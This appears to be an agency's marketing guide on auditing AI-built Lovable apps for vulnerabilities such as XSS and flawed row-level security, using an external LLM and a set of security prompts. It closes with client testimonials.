How to Secure your Lovable Apps

Speed is the primary promise of AI development. Tools like Lovable allow founders to ship functional applications in record time. However, speed often comes at the cost of security.

In a recent internal demonstration, our team ran security checks on a job board application built entirely with AI. Despite looking fully functional, the application had critical vulnerabilities. Within seconds, we were able to:

  1. Bypass Admin Approval: We posted a "live" job as a standard user, completely skipping the required administrative review process.
  2. Inject Malicious Code: We submitted a job listing containing a hidden script that stole the admin’s credentials the moment they viewed the dashboard.

Most concerning was that the platform's built-in scanner failed to detect either issue.

This highlights a fundamental reality of AI development: AI agents are designed to build, not secure. When you rely on the same AI to write and check its own code, you introduce a "blind spot."

This guide outlines our internal framework for hardening AI-generated applications using an external Security Prompt workflow.

Watch video guide to know the right way to audit your code using GitHub:

The "External Security Prompt" Framework

To properly secure an app built with Lovable (or any AI builder), you must decouple the builder from the security checker. An external Large Language Model (LLM) with fresh context is required to execute these prompts effectively.

Step 1: Connect the Codebase

A common mistake is copying and pasting individual files for checks. For a comprehensive review, the external AI needs access to the full repository context.

  • Recommended Tools: Claude (via Projects) or ChatGPT (via GitHub integration).
  • Action: Connect the GitHub repository directly to the LLM. This allows the AI to traverse the file structure and understand dependencies before running the security prompts.

Step 2: Run Targeted Security Prompts

Generic instructions like "check this for bugs" are insufficient. We utilize specific Security Prompts designed to identify distinct vulnerability classes, such as Cross-Site Scripting (XSS) or insecure API endpoints.

  • The Process: Input a specialized security prompt from our library into the external LLM.
  • The Output: The model will generate a detailed report flagging specific lines of code that pose security risks.

Step 3: The "One-by-One" Remediation Strategy

Crucial Rule: Do not dump the entire security report back into the building agent.

AI models degrade in performance when overloaded with context.

  1. Review: Analyze the report manually.
  2. Isolate: Ask the external AI to summarize one specific issue and generate a fix instruction.
  3. Remediate: Feed that single fix instruction back into Lovable.
  4. Repeat: Cycle through the report one vulnerability at a time.

Deep Dive: Fixing Database Permissions (RLS)

Simple code scans often miss Row Level Security (RLS) vulnerabilities. This was the specific flaw that allowed us to bypass the admin approval process in our demo. The code was syntactically correct, but the logic was flawed.

To catch this, we use a two-step Security Prompt sequence:

1. The Authorization Rules Writer

First, we run a prompt that analyzes the application's intended logic and writes out plain-English rules.

  • Example Output: "Users can create draft jobs. Only Admins can update status to 'Active'."

2. The RLS Policy Analyzer

Next, we run a prompt that compares those written rules against the actual database policies (e.g., in Supabase/PostgreSQL). This cross-reference highlights where the code fails to enforce the business logic.

The Zero-Cost Security Method

For teams without access to paid LLM subscriptions (like Claude Pro or ChatGPT Team), effective security checks are still possible using GitHub Codespaces and Google’s Gemini.

1. Initialize the Environment

Navigate to the GitHub repository and launch a "Codespace." This creates a cloud-based development environment directly in the browser.

2. Install the Gemini CLI

Google’s Gemini model offers a high-performance free tier suitable for running security prompts. In the Codespace terminal, install the necessary tools:

npm install -g @google/generative-ai

3. Authenticate and Secure

Authenticate using a personal Google account to access the free tier. Once logged in via the terminal, you can paste the security prompts directly into the command line. Gemini will process the codebase and output the same level of analysis as paid alternatives.

Access Free 20+ Security Prompt:

We have compiled the full suite of 20+ Security Prompts used in our process, covering input validation, authentication logic, and spam prevention.

Conclusion

Building with AI does not eliminate the need for engineering discipline. If a team is "vibe coding" building via prompts without security reviews, they are likely deploying vulnerabilities.

To ensure your application is production-ready:

  • Separate concerns: Never use the builder to check itself.
  • Context matters: Give the external AI access to the full repository.
  • Iterate: Fix vulnerabilities individually to maintain code stability.

Have a question? Get in touch below

"AZKY has developed an AI training platform for us. I have really enjoyed working with AZKY due to their clear communication and positive attitude to take on challenges"

Dr Jon Turvey

Founder @ Simflow AI, NHS Doctor, UK

AZKY doesn't just try to build whatever you ask them to. They take time to understand your business objectives and propose changes based on what we might actually need. This way, they quickly became an integral part of our business.

Lauri Lahi

CEO- Emerhub, RecruitGo

"...team went above and beyond to be solutions oriented when partnering with us on what was essentially our first attempt at no code development..."

Jenny Cox

The Combination Rule

Have a product idea?

We have probably built something similar before, let us help you